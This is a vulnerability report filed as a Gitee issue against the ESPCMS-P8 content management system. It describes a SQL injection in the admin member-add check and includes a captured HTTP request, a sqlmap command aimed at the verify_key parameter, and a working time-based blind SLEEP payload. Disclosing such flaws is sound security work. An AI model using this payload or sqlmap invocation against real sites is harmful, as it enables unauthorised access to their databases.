8 Star 10 Fork 0

轻舞飞沙 / 易思ESPCMS-P8企业建站管理系统

 / 详情

There is a sql injection vulnerability in ESPCMS P8.21120101

待办的
创建于  
2022-12-29 16:04

Issue

After logging in to the background, there is a SQL injection vulnerability in adding member function points

Steps to reproduce

  1. Log in to the management background
  2. Click Member>Add Member
    1
    2
    3

Problematic packets:

GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
Host: 127.0.0.1:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

use sqlmap: sqlmap.py -r ss.txt -p verify_key --current-db

输入图片说明

---
Parameter: verify_key (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
---

评论 (0)

jakets 创建了任务

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
PHP
1
https://gitee.com/earclink/espcms.git
git@gitee.com:earclink/espcms.git
earclink
espcms
易思ESPCMS-P8企业建站管理系统

搜索帮助